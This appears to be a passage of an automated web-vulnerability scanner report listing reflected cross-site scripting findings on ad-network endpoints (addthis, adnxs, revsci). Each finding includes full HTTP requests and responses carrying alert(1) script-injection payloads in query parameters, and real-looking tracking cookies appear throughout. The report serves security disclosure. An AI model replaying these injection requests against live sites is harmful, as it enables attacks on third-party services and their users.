GET /red/psi/sites/www.marqui.com/p.json?callback=_ate.ad.hpr66809<script>alert(1)</script>0ed15865e19&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.marqui.com%2Fcompany%2Fcontact-us%2F&ref=http%3A%2F%2Fwww.marqui.com%2F&18q07bs HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302308295.60|1302308295.1FE|1302197723.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 459
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:22:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:22:00 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308520.1FE|1302308520.60|1302308520.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:21:59 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:22:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:22:00 GMT
Connection: close

_ate.ad.hpr66809<script>alert(1)</script>0ed15865e19({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.marqui.
...[SNIP]...
1.80. http://ds.addthis.com/red/psi/sites/www.wcax.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wcax.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 63658<script>alert(1)</script>12e32e4184e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wcax.com/p.json?callback=_ate.ad.hpr63658<script>alert(1)</script>12e32e4184e&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.wcax.com%2F&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18196&1dw210o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1302308519.1FE|1302308519.60|1302308519.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 12:31:40 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 12:31:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 12:31:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:31:40 GMT
Connection: close

_ate.ad.hpr63658<script>alert(1)</script>12e32e4184e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
1.81. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f34'-alert(1)-'106a47e4832 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..c4f34'-alert(1)-'106a47e4832&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:46 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
19%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..c4f34'-alert(1)-'106a47e4832&referrer=http://www.wcax.com/Global/category.asp">
...[SNIP]...
1.82. http://ib.adnxs.com/ab [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e56'-alert(1)-'8288101d5af was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp25e56'-alert(1)-'8288101d5af&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:50 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
62113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp25e56'-alert(1)-'8288101d5af">
...[SNIP]...
1.83. http://ib.adnxs.com/ab [tt_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f02d'-alert(1)-'ada50828606 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-165f02d'-alert(1)-'ada50828606&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:33 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D&tt_code=vert-165f02d'-alert(1)-'ada50828606&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%
...[SNIP]...
1.84. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ba50'%3balert(1)//c512c095fc5 was submitted in the redir parameter. This input was echoed as 4ba50';alert(1)//c512c095fc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302538878%3F4ba50'%3balert(1)//c512c095fc5 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgBIAEoATCf1YztBBCf1YztBBgA; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb171130=5_[r^208WM6[kCcE/qX3lJExr?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP3vuRz0wYHU38f5MdWfsOnifKqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAAzwgBAgUCAAUAAAAAQyTfEQAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12090145724922326,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12090145724922326%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 16:21:51 GMT
Content-Length: 521

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;ord=1302538878?4ba50';alert(1)//c512c095fc5">
...[SNIP]...
1.85. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 220c2<script>alert(1)</script>abfd15efa4b was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E05511220c2<script>alert(1)</script>abfd15efa4b HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rtc_33wk=MLuBO6+ht4kWQAcYCwq3qvGtUKGrBZ8doDP9+JcCeOOzqVD+we0MdrEy1Q9wVOPnx3+D9JMtHr3sXfzNw3d1fHSsgQ0j1PMA3u0A65h1Zdx44dhHS5+AaIPoFOSkJCsUdawtp/+wPz4ovCW6/jlMSWl5gugGYoVzCFcXDgXPFV44jOFQ9OvWXmsv0TUYz+5nkUCtLLzUzXTh7M+zWyh9Os1EVo5VMh5rHTjjZnK71873pcHYYzezCHZTM/2+0SL4Kjk8dPShfwkCSnJWFkNsK0MzXgFnrllh6u548CifcAFwE1rm2D91a3IypBzg; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPNOUllLgIQVp2RxvqihGlAFSS4kHOeU66DJ0MOK5EzOCS2EByYfg7Qrqibp15G8KTrDuD6DAQkoQrdkdlzUiguejeRGfCSakzCoHZKm/jYrxQbkP1M3eZsdsuqc+uLh77lb/zkdFc3E54U2MEX2fHfbhfnLsMGeW5DWmK1KT64FYIE9CapbZj+AZ0UnNTmtUbpdxDL/rVbtchfPfF47acMHxbgs3BSVlWVsirz+chCnZgnJ1SCiD9YAA==; 